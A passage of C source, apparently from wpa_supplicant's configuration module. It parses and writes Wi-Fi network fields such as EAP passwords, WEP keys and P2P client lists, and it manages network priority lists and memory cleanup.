"" : " ", name); if (ret < 0 || ret >= end - pos) break; pos += ret; } } end[-1] = '\0'; return buf; } static int wpa_config_parse_password(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { u8 *hash; if (os_strcmp(value, "NULL") == 0) { wpa_printf(MSG_DEBUG, "Unset configuration string 'password'"); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = NULL; ssid->eap.password_len = 0; return 0; } #ifdef CONFIG_EXT_PASSWORD if (os_strncmp(value, "ext:", 4) == 0) { char *name = os_strdup(value + 4); if (name == NULL) return -1; bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = (u8 *) name; ssid->eap.password_len = os_strlen(name); ssid->eap.flags &= ~EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags |= EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } #endif /* CONFIG_EXT_PASSWORD */ if (os_strncmp(value, "hash:", 5) != 0) { char *tmp; size_t res_len; tmp = wpa_config_parse_string(value, &res_len); if (tmp == NULL) { wpa_printf(MSG_ERROR, "Line %d: failed to parse " "password.", line); return -1; } wpa_hexdump_ascii_key(MSG_MSGDUMP, data->name, (u8 *) tmp, res_len); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = (u8 *) tmp; ssid->eap.password_len = res_len; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } /* NtPasswordHash: hash:<32 hex digits> */ if (os_strlen(value + 5) != 2 * 16) { wpa_printf(MSG_ERROR, "Line %d: Invalid password hash length " "(expected 32 hex digits)", line); return -1; } hash = os_malloc(16); if (hash == NULL) return -1; if (hexstr2bin(value + 5, hash, 16)) { os_free(hash); wpa_printf(MSG_ERROR, "Line %d: Invalid password hash", line); return -1; } wpa_hexdump_key(MSG_MSGDUMP, data->name, hash, 16); bin_clear_free(ssid->eap.password, ssid->eap.password_len); ssid->eap.password = hash; ssid->eap.password_len = 16; ssid->eap.flags |= EAP_CONFIG_FLAGS_PASSWORD_NTHASH; ssid->eap.flags &= ~EAP_CONFIG_FLAGS_EXT_PASSWORD; return 0; } static char * wpa_config_write_password(const struct parse_data *data, struct wpa_ssid *ssid) { char *buf; if (ssid->eap.password == NULL) return NULL; #ifdef CONFIG_EXT_PASSWORD if (ssid->eap.flags & EAP_CONFIG_FLAGS_EXT_PASSWORD) { buf = os_zalloc(4 + ssid->eap.password_len + 1); if (buf == NULL) return NULL; os_memcpy(buf, "ext:", 4); os_memcpy(buf + 4, ssid->eap.password, ssid->eap.password_len); return buf; } #endif /* CONFIG_EXT_PASSWORD */ if (!(ssid->eap.flags & EAP_CONFIG_FLAGS_PASSWORD_NTHASH)) { return wpa_config_write_string( ssid->eap.password, ssid->eap.password_len); } buf = os_malloc(5 + 32 + 1); if (buf == NULL) return NULL; os_memcpy(buf, "hash:", 5); wpa_snprintf_hex(buf + 5, 32 + 1, ssid->eap.password, 16); return buf; } #endif /* IEEE8021X_EAPOL */ static int wpa_config_parse_wep_key(u8 *key, size_t *len, int line, const char *value, int idx) { char *buf, title[20]; int res; buf = wpa_config_parse_string(value, len); if (buf == NULL) { wpa_printf(MSG_ERROR, "Line %d: Invalid WEP key %d '%s'.", line, idx, value); return -1; } if (*len > MAX_WEP_KEY_LEN) { wpa_printf(MSG_ERROR, "Line %d: Too long WEP key %d '%s'.", line, idx, value); os_free(buf); return -1; } if (*len && *len != 5 && *len != 13 && *len != 16) { wpa_printf(MSG_ERROR, "Line %d: Invalid WEP key length %u - " "this network block will be ignored", line, (unsigned int) *len); } os_memcpy(key, buf, *len); str_clear_free(buf); res = os_snprintf(title, sizeof(title), "wep_key%d", 
idx); if (res >= 0 && (size_t) res < sizeof(title)) wpa_hexdump_key(MSG_MSGDUMP, title, key, *len); return 0; } static int wpa_config_parse_wep_key0(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[0], &ssid->wep_key_len[0], line, value, 0); } static int wpa_config_parse_wep_key1(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[1], &ssid->wep_key_len[1], line, value, 1); } static int wpa_config_parse_wep_key2(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[2], &ssid->wep_key_len[2], line, value, 2); } static int wpa_config_parse_wep_key3(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { return wpa_config_parse_wep_key(ssid->wep_key[3], &ssid->wep_key_len[3], line, value, 3); } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_wep_key(struct wpa_ssid *ssid, int idx) { if (ssid->wep_key_len[idx] == 0) return NULL; return wpa_config_write_string(ssid->wep_key[idx], ssid->wep_key_len[idx]); } static char * wpa_config_write_wep_key0(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 0); } static char * wpa_config_write_wep_key1(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 1); } static char * wpa_config_write_wep_key2(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 2); } static char * wpa_config_write_wep_key3(const struct parse_data *data, struct wpa_ssid *ssid) { return wpa_config_write_wep_key(ssid, 3); } #endif /* NO_CONFIG_WRITE */ #ifdef CONFIG_P2P static int wpa_config_parse_go_p2p_dev_addr(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { if (value[0] == '\0' || os_strcmp(value, "\"\"") == 0 || os_strcmp(value, "any") == 0) { os_memset(ssid->go_p2p_dev_addr, 0, ETH_ALEN); wpa_printf(MSG_MSGDUMP, "GO P2P Device Address any"); return 0; } if (hwaddr_aton(value, ssid->go_p2p_dev_addr)) { wpa_printf(MSG_ERROR, "Line %d: Invalid GO P2P Device Address '%s'.", line, value); return -1; } ssid->bssid_set = 1; wpa_printf(MSG_MSGDUMP, "GO P2P Device Address " MACSTR, MAC2STR(ssid->go_p2p_dev_addr)); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_go_p2p_dev_addr(const struct parse_data *data, struct wpa_ssid *ssid) { char *value; int res; if (is_zero_ether_addr(ssid->go_p2p_dev_addr)) return NULL; value = os_malloc(20); if (value == NULL) return NULL; res = os_snprintf(value, 20, MACSTR, MAC2STR(ssid->go_p2p_dev_addr)); if (res < 0 || res >= 20) { os_free(value); return NULL; } value[20 - 1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_p2p_client_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { const char *pos; u8 *buf, *n, addr[ETH_ALEN]; size_t count; buf = NULL; count = 0; pos = value; while (pos && *pos) { while (*pos == ' ') pos++; if (hwaddr_aton(pos, addr)) { if (count == 0) { wpa_printf(MSG_ERROR, "Line %d: Invalid " "p2p_client_list address '%s'.", line, value); os_free(buf); return -1; } /* continue anyway since this could have been from a * truncated configuration file line */ wpa_printf(MSG_INFO, "Line %d: Ignore likely " "truncated p2p_client_list address '%s'", line, pos); } else { n = os_realloc_array(buf, count + 1, ETH_ALEN); if (n == 
NULL) { os_free(buf); return -1; } buf = n; os_memmove(buf + ETH_ALEN, buf, count * ETH_ALEN); os_memcpy(buf, addr, ETH_ALEN); count++; wpa_hexdump(MSG_MSGDUMP, "p2p_client_list", addr, ETH_ALEN); } pos = os_strchr(pos, ' '); } os_free(ssid->p2p_client_list); ssid->p2p_client_list = buf; ssid->num_p2p_clients = count; return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_p2p_client_list(const struct parse_data *data, struct wpa_ssid *ssid) { char *value, *end, *pos; int res; size_t i; if (ssid->p2p_client_list == NULL || ssid->num_p2p_clients == 0) return NULL; value = os_malloc(20 * ssid->num_p2p_clients); if (value == NULL) return NULL; pos = value; end = value + 20 * ssid->num_p2p_clients; for (i = ssid->num_p2p_clients; i > 0; i--) { res = os_snprintf(pos, end - pos, MACSTR " ", MAC2STR(ssid->p2p_client_list + (i - 1) * ETH_ALEN)); if (res < 0 || res >= end - pos) { os_free(value); return NULL; } pos += res; } if (pos > value) pos[-1] = '\0'; return value; } #endif /* NO_CONFIG_WRITE */ static int wpa_config_parse_psk_list(const struct parse_data *data, struct wpa_ssid *ssid, int line, const char *value) { struct psk_list_entry *p; const char *pos; p = os_zalloc(sizeof(*p)); if (p == NULL) return -1; pos = value; if (os_strncmp(pos, "P2P-", 4) == 0) { p->p2p = 1; pos += 4; } if (hwaddr_aton(pos, p->addr)) { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list address '%s'", line, pos); os_free(p); return -1; } pos += 17; if (*pos != '-') { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list '%s'", line, pos); os_free(p); return -1; } pos++; if (hexstr2bin(pos, p->psk, PMK_LEN) || pos[PMK_LEN * 2] != '\0') { wpa_printf(MSG_ERROR, "Line %d: Invalid psk_list PSK '%s'", line, pos); os_free(p); return -1; } dl_list_add(&ssid->psk_list, &p->list); return 0; } #ifndef NO_CONFIG_WRITE static char * wpa_config_write_psk_list(const struct parse_data *data, struct wpa_ssid *ssid) { return NULL; } #endif /* NO_CONFIG_WRITE */ #endif /* CONFIG_P2P */ /* Helper macros for network block parser */ #ifdef OFFSET #undef OFFSET #endif /* OFFSET */ /* OFFSET: Get offset of a variable within the wpa_ssid structure */ #define OFFSET(v) ((void *) &((struct wpa_ssid *) 0)->v) /* STR: Define a string variable for an ASCII string; f = field name */ #ifdef NO_CONFIG_WRITE #define _STR(f) #f, wpa_config_parse_str, OFFSET(f) #define _STRe(f) #f, wpa_config_parse_str, OFFSET(eap.f) #else /* NO_CONFIG_WRITE */ #define _STR(f) #f, wpa_config_parse_str, wpa_config_write_str, OFFSET(f) #define _STRe(f) #f, wpa_config_parse_str, wpa_config_write_str, OFFSET(eap.f) #endif /* NO_CONFIG_WRITE */ #define STR(f) _STR(f), NULL, NULL, NULL, 0 #define STRe(f) _STRe(f), NULL, NULL, NULL, 0 #define STR_KEY(f) _STR(f), NULL, NULL, NULL, 1 #define STR_KEYe(f) _STRe(f), NULL, NULL, NULL, 1 /* STR_LEN: Define a string variable with a separate variable for storing the * data length. Unlike STR(), this can be used to store arbitrary binary data * (i.e., even nul termination character). */ #define _STR_LEN(f) _STR(f), OFFSET(f ## _len) #define _STR_LENe(f) _STRe(f), OFFSET(eap.f ## _len) #define STR_LEN(f) _STR_LEN(f), NULL, NULL, 0 #define STR_LENe(f) _STR_LENe(f), NULL, NULL, 0 #define STR_LEN_KEY(f) _STR_LEN(f), NULL, NULL, 1 /* STR_RANGE: Like STR_LEN(), but with minimum and maximum allowed length * explicitly specified. 
 */
#define _STR_RANGE(f, min, max) _STR_LEN(f), (void *) (min), (void *) (max)
#define STR_RANGE(f, min, max) _STR_RANGE(f, min, max), 0
#define STR_RANGE_KEY(f, min, max) _STR_RANGE(f, min, max), 1

#ifdef NO_CONFIG_WRITE
#define _INT(f) #f, wpa_config_parse_int, OFFSET(f), (void *) 0
#define _INTe(f) #f, wpa_config_parse_int, OFFSET(eap.f), (void *) 0
#else /* NO_CONFIG_WRITE */
#define _INT(f) #f, wpa_config_parse_int, wpa_config_write_int, \
	OFFSET(f), (void *) 0
#define _INTe(f) #f, wpa_config_parse_int, wpa_config_write_int, \
	OFFSET(eap.f), (void *) 0
#endif /* NO_CONFIG_WRITE */

/* INT: Define an integer variable */
#define INT(f) _INT(f), NULL, NULL, 0
#define INTe(f) _INTe(f), NULL, NULL, 0

/* INT_RANGE: Define an integer variable with allowed value range */
#define INT_RANGE(f, min, max) _INT(f), (void *) (min), (void *) (max), 0

/* FUNC: Define a configuration variable that uses a custom function for
 * parsing and writing the value. */
#ifdef NO_CONFIG_WRITE
#define _FUNC(f) #f, wpa_config_parse_ ## f, NULL, NULL, NULL, NULL
#else /* NO_CONFIG_WRITE */
#define _FUNC(f) #f, wpa_config_parse_ ## f, wpa_config_write_ ## f, \
	NULL, NULL, NULL, NULL
#endif /* NO_CONFIG_WRITE */
#define FUNC(f) _FUNC(f), 0
#define FUNC_KEY(f) _FUNC(f), 1

/*
 * Table of network configuration variables. This table is used to parse each
 * network configuration variable, e.g., each line in wpa_supplicant.conf file
 * that is inside a network block.
 *
 * This table is generated using the helper macros defined above and with
 * generous help from the C pre-processor. The field name is stored as a string
 * into .name and for STR and INT types, the offset of the target buffer within
 * struct wpa_ssid is stored in .param1. .param2 (if not NULL) is a similar
 * offset to the field containing the length of the configuration variable.
 * .param3 and .param4 can be used to mark the allowed range (length for STR
 * and value for INT).
 *
 * For each configuration line in wpa_supplicant.conf, the parser goes through
 * this table and selects the entry that matches the field name. The parser
 * function (.parser) is then called to parse the actual value of the field.
 *
 * This kind of mechanism makes it easy to add new configuration parameters,
 * since only one line needs to be added into this table and into the
 * struct wpa_ssid definition if the new variable is either a string or
 * integer. More complex types will need to use their own parser and writer
 * functions.
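 *
 * For illustration (this expansion is derived from the macros above, not
 * part of the original comment), the entry { INT_RANGE(scan_ssid, 0, 1) }
 * expands, when NO_CONFIG_WRITE is not defined, to:
 *
 *	{ "scan_ssid", wpa_config_parse_int, wpa_config_write_int,
 *	  OFFSET(scan_ssid), (void *) 0, (void *) 0, (void *) 1, 0 }
 *
 * i.e., .name, .parser, .writer, .param1..param4 and .key_data in order.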
*/ static const struct parse_data ssid_fields[] = { { STR_RANGE(ssid, 0, MAX_SSID_LEN) }, { INT_RANGE(scan_ssid, 0, 1) }, { FUNC(bssid) }, { FUNC_KEY(psk) }, { FUNC(proto) }, { FUNC(key_mgmt) }, { INT(bg_scan_period) }, { FUNC(pairwise) }, { FUNC(group) }, { FUNC(auth_alg) }, { FUNC(scan_freq) }, { FUNC(freq_list) }, #ifdef IEEE8021X_EAPOL { FUNC(eap) }, { STR_LENe(identity) }, { STR_LENe(anonymous_identity) }, { FUNC_KEY(password) }, { STRe(ca_cert) }, { STRe(ca_path) }, { STRe(client_cert) }, { STRe(private_key) }, { STR_KEYe(private_key_passwd) }, { STRe(dh_file) }, { STRe(subject_match) }, { STRe(altsubject_match) }, { STRe(domain_suffix_match) }, { STRe(ca_cert2) }, { STRe(ca_path2) }, { STRe(client_cert2) }, { STRe(private_key2) }, { STR_KEYe(private_key2_passwd) }, { STRe(dh_file2) }, { STRe(subject_match2) }, { STRe(altsubject_match2) }, { STRe(domain_suffix_match2) }, { STRe(phase1) }, { STRe(phase2) }, { STRe(pcsc) }, { STR_KEYe(pin) }, { STRe(engine_id) }, { STRe(key_id) }, { STRe(cert_id) }, { STRe(ca_cert_id) }, { STR_KEYe(pin2) }, { STRe(engine2_id) }, { STRe(key2_id) }, { STRe(cert2_id) }, { STRe(ca_cert2_id) }, { INTe(engine) }, { INTe(engine2) }, { INT(eapol_flags) }, { INTe(sim_num) }, { STRe(openssl_ciphers) }, #endif /* IEEE8021X_EAPOL */ { FUNC_KEY(wep_key0) }, { FUNC_KEY(wep_key1) }, { FUNC_KEY(wep_key2) }, { FUNC_KEY(wep_key3) }, { INT(wep_tx_keyidx) }, { INT(priority) }, #ifdef IEEE8021X_EAPOL { INT(eap_workaround) }, { STRe(pac_file) }, { INTe(fragment_size) }, { INTe(ocsp) }, #endif /* IEEE8021X_EAPOL */ { INT_RANGE(mode, 0, 4) }, { INT_RANGE(proactive_key_caching, 0, 1) }, { INT_RANGE(disabled, 0, 2) }, { STR(id_str) }, #ifdef CONFIG_IEEE80211W { INT_RANGE(ieee80211w, 0, 2) }, #endif /* CONFIG_IEEE80211W */ { INT_RANGE(peerkey, 0, 1) }, { INT_RANGE(mixed_cell, 0, 1) }, { INT_RANGE(frequency, 0, 65000) }, { INT(wpa_ptk_rekey) }, { STR(bgscan) }, { INT_RANGE(ignore_broadcast_ssid, 0, 2) }, #ifdef CONFIG_P2P { FUNC(go_p2p_dev_addr) }, { FUNC(p2p_client_list) }, { FUNC(psk_list) }, #endif /* CONFIG_P2P */ #ifdef CONFIG_HT_OVERRIDES { INT_RANGE(disable_ht, 0, 1) }, { INT_RANGE(disable_ht40, -1, 1) }, { INT_RANGE(disable_sgi, 0, 1) }, { INT_RANGE(disable_ldpc, 0, 1) }, { INT_RANGE(ht40_intolerant, 0, 1) }, { INT_RANGE(disable_max_amsdu, -1, 1) }, { INT_RANGE(ampdu_factor, -1, 3) }, { INT_RANGE(ampdu_density, -1, 7) }, { STR(ht_mcs) }, #endif /* CONFIG_HT_OVERRIDES */ #ifdef CONFIG_VHT_OVERRIDES { INT_RANGE(disable_vht, 0, 1) }, { INT(vht_capa) }, { INT(vht_capa_mask) }, { INT_RANGE(vht_rx_mcs_nss_1, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_2, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_3, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_4, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_5, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_6, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_7, -1, 3) }, { INT_RANGE(vht_rx_mcs_nss_8, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_1, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_2, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_3, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_4, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_5, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_6, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_7, -1, 3) }, { INT_RANGE(vht_tx_mcs_nss_8, -1, 3) }, #endif /* CONFIG_VHT_OVERRIDES */ { INT(ap_max_inactivity) }, { INT(dtim_period) }, { INT(beacon_int) }, #ifdef CONFIG_MACSEC { INT_RANGE(macsec_policy, 0, 1) }, #endif /* CONFIG_MACSEC */ #ifdef CONFIG_HS20 { INT(update_identifier) }, #endif /* CONFIG_HS20 */ { INT_RANGE(mac_addr, 0, 2) }, }; #undef OFFSET #undef _STR #undef STR #undef STR_KEY #undef _STR_LEN #undef STR_LEN 
#undef STR_LEN_KEY #undef _STR_RANGE #undef STR_RANGE #undef STR_RANGE_KEY #undef _INT #undef INT #undef INT_RANGE #undef _FUNC #undef FUNC #undef FUNC_KEY #define NUM_SSID_FIELDS ARRAY_SIZE(ssid_fields) /** * wpa_config_add_prio_network - Add a network to priority lists * @config: Configuration data from wpa_config_read() * @ssid: Pointer to the network configuration to be added to the list * Returns: 0 on success, -1 on failure * * This function is used to add a network block to the priority list of * networks. This must be called for each network when reading in the full * configuration. In addition, this can be used indirectly when updating * priorities by calling wpa_config_update_prio_list(). */ int wpa_config_add_prio_network(struct wpa_config *config, struct wpa_ssid *ssid) { int prio; struct wpa_ssid *prev, **nlist; /* * Add to an existing priority list if one is available for the * configured priority level for this network. */ for (prio = 0; prio < config->num_prio; prio++) { prev = config->pssid[prio]; if (prev->priority == ssid->priority) { while (prev->pnext) prev = prev->pnext; prev->pnext = ssid; return 0; } } /* First network for this priority - add a new priority list */ nlist = os_realloc_array(config->pssid, config->num_prio + 1, sizeof(struct wpa_ssid *)); if (nlist == NULL) return -1; for (prio = 0; prio < config->num_prio; prio++) { if (nlist[prio]->priority < ssid->priority) { os_memmove(&nlist[prio + 1], &nlist[prio], (config->num_prio - prio) * sizeof(struct wpa_ssid *)); break; } } nlist[prio] = ssid; config->num_prio++; config->pssid = nlist; return 0; } /** * wpa_config_update_prio_list - Update network priority list * @config: Configuration data from wpa_config_read() * Returns: 0 on success, -1 on failure * * This function is called to update the priority list of networks in the * configuration when a network is being added or removed. This is also called * if a priority for a network is changed. 
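 *
 * Illustrative example (the priority values are hypothetical): for three
 * networks with priorities 5, 5 and 1, config->pssid[0] ends up pointing
 * at the first priority-5 network (the second one chained behind it
 * through pnext) and config->pssid[1] at the priority-1 network, i.e.,
 * one list per priority value, ordered by descending priority.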
*/ int wpa_config_update_prio_list(struct wpa_config *config) { struct wpa_ssid *ssid; int ret = 0; os_free(config->pssid); config->pssid = NULL; config->num_prio = 0; ssid = config->ssid; while (ssid) { ssid->pnext = NULL; if (wpa_config_add_prio_network(config, ssid) < 0) ret = -1; ssid = ssid->next; } return ret; } #ifdef IEEE8021X_EAPOL static void eap_peer_config_free(struct eap_peer_config *eap) { os_free(eap->eap_methods); bin_clear_free(eap->identity, eap->identity_len); os_free(eap->anonymous_identity); bin_clear_free(eap->password, eap->password_len); os_free(eap->ca_cert); os_free(eap->ca_path); os_free(eap->client_cert); os_free(eap->private_key); str_clear_free(eap->private_key_passwd); os_free(eap->dh_file); os_free(eap->subject_match); os_free(eap->altsubject_match); os_free(eap->domain_suffix_match); os_free(eap->ca_cert2); os_free(eap->ca_path2); os_free(eap->client_cert2); os_free(eap->private_key2); str_clear_free(eap->private_key2_passwd); os_free(eap->dh_file2); os_free(eap->subject_match2); os_free(eap->altsubject_match2); os_free(eap->domain_suffix_match2); os_free(eap->phase1); os_free(eap->phase2); os_free(eap->pcsc); str_clear_free(eap->pin); os_free(eap->engine_id); os_free(eap->key_id); os_free(eap->cert_id); os_free(eap->ca_cert_id); os_free(eap->key2_id); os_free(eap->cert2_id); os_free(eap->ca_cert2_id); str_clear_free(eap->pin2); os_free(eap->engine2_id); os_free(eap->otp); os_free(eap->pending_req_otp); os_free(eap->pac_file); bin_clear_free(eap->new_password, eap->new_password_len); str_clear_free(eap->external_sim_resp); os_free(eap->openssl_ciphers); } #endif /* IEEE8021X_EAPOL */ /** * wpa_config_free_ssid - Free network/ssid configuration data * @ssid: Configuration data for the network * * This function frees all resources allocated for the network configuration * data. 
*/ void wpa_config_free_ssid(struct wpa_ssid *ssid) { struct psk_list_entry *psk; os_free(ssid->ssid); os_memset(ssid->psk, 0, sizeof(ssid->psk)); str_clear_free(ssid->passphrase); os_free(ssid->ext_psk); #ifdef IEEE8021X_EAPOL eap_peer_config_free(&ssid->eap); #endif /* IEEE8021X_EAPOL */ os_free(ssid->id_str); os_free(ssid->scan_freq); os_free(ssid->freq_list); os_free(ssid->bgscan); os_free(ssid->p2p_client_list); #ifdef CONFIG_HT_OVERRIDES os_free(ssid->ht_mcs); #endif /* CONFIG_HT_OVERRIDES */ while ((psk = dl_list_first(&ssid->psk_list, struct psk_list_entry, list))) { dl_list_del(&psk->list); os_free(psk); } os_free(ssid); } void wpa_config_free_cred(struct wpa_cred *cred) { size_t i; os_free(cred->realm); str_clear_free(cred->username); str_clear_free(cred->password); os_free(cred->ca_cert); os_free(cred->client_cert); os_free(cred->private_key); str_clear_free(cred->private_key_passwd); os_free(cred->imsi); str_clear_free(cred->milenage); for (i = 0; i < cred->num_domain; i++) os_free(cred->domain[i]); os_free(cred->domain); os_free(cred->domain_suffix_match); os_free(cred->eap_method); os_free(cred->phase1); os_free(cred->phase2); os_free(cred->excluded_ssid); os_free(cred->roaming_partner); os_free(cred->provisioning_sp); for (i = 0; i < cred->num_req_conn_capab; i++) os_free(cred->req_conn_capab_port[i]); os_free(cred->req_conn_capab_port); os_free(cred->req_conn_capab_proto); os_free(cred); } void wpa_config_flush_blobs(struct wpa_config *config) { #ifndef CONFIG_NO_CONFIG_BLOBS struct wpa_config_blob *blob, *prev; blob = config->blobs; config->blobs = NULL; while (blob) { prev = blob; blob = blob->next; wpa_config_free_blob(prev); } #endif /* CONFIG_NO_CONFIG_BLOBS */ } /** * wpa_config_free - Free configuration data * @config: Configuration data from wpa_config_read() * * This function frees all resources allocated for the configuration data by * wpa_config_read(). 
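 *
 * Note (added for clarity): this single call tears down the whole
 * configuration, walking the network and credential lists through
 * wpa_config_free_ssid() and wpa_config_free_cred() above and flushing
 * binary blobs through wpa_config_flush_blobs().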
*/ void wpa_config_free(struct wpa_config *config) { struct wpa_ssid *ssid, *prev = NULL; struct wpa_cred *cred, *cprev; ssid = config->ssid; while (ssid) { prev = ssid; ssid = ssid->next; wpa_config_free_ssid(prev); } cred = config->cred; while (cred) { cprev = cred; cred = cred->next; wpa_config_free_cred(cprev); } wpa_config_flush_blobs(config); wpabuf_free(config->wps_vendor_ext_m1); os_free(config->ctrl_interface); os_free(config->ctrl_interface_group); os_free(config->opensc_engine_path); os_free(config->pkcs11_engine_path); os_free(config->pkcs11_module_path); os_free(config->openssl_ciphers); os_free(config->pcsc_reader); str_clear_free(config->pcsc_pin); os_free(config->driver_param); os_free(config->device_name); os_free(config->manufacturer); os_free(config->model_name); os_free(config->model_number); os_free(config->serial_number); os_free(config->config_methods); os_free(config->p2p_ssid_postfix); os_free(config->pssid); os_free(config->p2p_pref_chan); os_free(config->p2p_no_go_freq.range); os_free(config->autoscan); os_free(config->freq_list); wpabuf_free(config->wps_nfc_dh_pubkey); wpabuf_free(config->wps_nfc_dh_privkey); wpabuf_free(config->wps_nfc_dev_pw); os_free(config->ext_password_backend); os_free(config->sae_groups); wpabuf_free(config->ap_vendor_elements); os_free(config->osu_dir); os_free(config->wowlan_triggers); os_free(config); } /** * wpa_config_foreach_network - Iterate over each configured network * @config: Configuration data from wpa_config_read() * @func: Callback function to process each network * @arg: Opaque argument to pass to callback function * * Iterate over the set of configured networks calling the specified * function for each item. We guard against callbacks removing the * supplied network. */ void wpa_config_foreach_network(struct wpa_config *config, void (*func)(void *, struct wpa_ssid *), void *arg) { struct wpa_ssid *ssid, *next; ssid = config->ssid; while (ssid) { next = ssid->next; func(arg, ssid); ssid = next; } } /** * wpa_config_get_network - Get configured network based on id * @config: Configuration data from wpa_config_read() * @id: Unique network id to search for * Returns: Network configuration or %NULL if not found */ struct wpa_ssid * wpa_config_get_network(struct wpa_config *config, int id) { struct wpa_ssid *ssid; ssid = config->ssid; while (ssid) { if (id == ssid->id) break; ssid = ssid->next; } return ssid; } /** * wpa_config_add_network - Add a new network with empty configuration * @config: Configuration data from wpa_config_read() * Returns: The new network configuration or %NULL if operation failed */ struct wpa_ssid * wpa_config_add_network(struct wpa_config *config) { int id; struct wpa_ssid *ssid, *last = NULL; id = -1; ssid = config->ssid; while (ssid) { if (ssid->id > id) id = ssid->id; last = ssid; ssid = ssid->next; } id++; ssid = os_zalloc(sizeof(*ssid)); if (ssid == NULL) return NULL; ssid->id = id; dl_list_init(&ssid->psk_list); if (last) last->next = ssid; else config->ssid = ssid; wpa_config_update_prio_list(config); return ssid; } /** * wpa_config_remove_network - Remove a configured network based on id * @config: Configuration data from wpa_config_read() * @id: Unique network id to search for * Returns: 0 on success, or -1 if the network was not found */ int wpa_config_remove_network(struct wpa_config *config, int id) { struct wpa_ssid *ssid, *prev = NULL; ssid = config->ssid; while (ssid) { if (id == ssid->id) break; prev = ssid; ssid = ssid->next; } if (ssid == NULL) return -1; if (prev) prev->next = 
ssid->next; else config->ssid = ssid->next; wpa_config_update_prio_list(config); wpa_config_free_ssid(ssid); return 0; } /** * wpa_config_set_network_defaults - Set network default values * @ssid: Pointer to network configuration data */ void wpa_config_set_network_defaults(struct wpa_ssid *ssid) { ssid->proto = DEFAULT_PROTO; ssid->pairwise_cipher = DEFAULT_PAIRWISE; ssid->group_cipher = DEFAULT_GROUP; ssid->key_mgmt = DEFAULT_KEY_MGMT; ssid->bg_scan_period = DEFAULT_BG_SCAN_PERIOD; #ifdef IEEE8021X_EAPOL ssid->eapol_flags = DEFAULT_EAPOL_FLAGS; ssid->eap_workaround = DEFAULT_EAP_WORKAROUND; ssid->eap.fragment_size = DEFAULT_FRAGMENT_SIZE; ssid->eap.sim_num = DEFAULT_USER_SELECTED_SIM; #endif /* IEEE8021X_EAPOL */ #ifdef CONFIG_HT_OVERRIDES ssid->disable_ht = DEFAULT_DISABLE_HT; ssid->disable_ht40 = DEFAULT_DISABLE_HT40; ssid->disable_sgi = DEFAULT_DISABLE_SGI; ssid->disable_ldpc = DEFAULT_DISABLE_LDPC; ssid->disable_max_amsdu = DEFAULT_DISABLE_MAX_AMSDU; ssid->ampdu_factor = DEFAULT_AMPDU_FACTOR; ssid->ampdu_density = DEFAULT_AMPDU_DENSITY; #endif /* CONFIG_HT_OVERRIDES */ #ifdef CONFIG_VHT_OVERRIDES ssid->vht_rx_mcs_nss_1 = -1; ssid->vht_rx_mcs_nss_2 = -1; ssid->vht_rx_mcs_nss_3 = -1; ssid->vht_rx_mcs_nss_4 = -1; ssid->vht_rx_mcs_nss_5 = -1; ssid->vht_rx_mcs_nss_6 = -1; ssid->vht_rx_mcs_nss_7 = -1; ssid->vht_rx_mcs_nss_8 = -1; ssid->vht_tx_mcs_nss_1 = -1; ssid->vht_tx_mcs_nss_2 = -1; ssid->vht_tx_mcs_nss_3 = -1; ssid->vht_tx_mcs_nss_4 = -1; ssid->vht_tx_mcs_nss_5 = -1; ssid->vht_tx_mcs_nss_6 = -1; ssid->vht_tx_mcs_nss_7 = -1; ssid->vht_tx_mcs_nss_8 = -1; #endif /* CONFIG_VHT_OVERRIDES */ ssid->proactive_key_caching = -1; #ifdef CONFIG_IEEE80211W ssid->ieee80211w = MGMT_FRAME_PROTECTION_DEFAULT; #endif /* CONFIG_IEEE80211W */ ssid->mac_addr = -1; } /** * wpa_config_set - Set a variable in network configuration * @ssid: Pointer to network configuration data * @var: Variable name, e.g., "ssid" * @value: Variable value * @line: Line number in configuration file or 0 if not used * Returns: 0 on success, -1 on failure * * This function can be used to set network configuration variables based on * both the configuration file and management interface input. The value * parameter must be in the same format as the text-based configuration file is * using. For example, strings are using double quotation marks. 
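 *
 * Minimal usage sketch (illustrative, not part of the original file; the
 * field names come from ssid_fields[] above, the values are made up):
 *
 *	wpa_config_set(ssid, "ssid", "\"example\"", 0);
 *	wpa_config_set(ssid, "key_mgmt", "WPA-PSK", 0);
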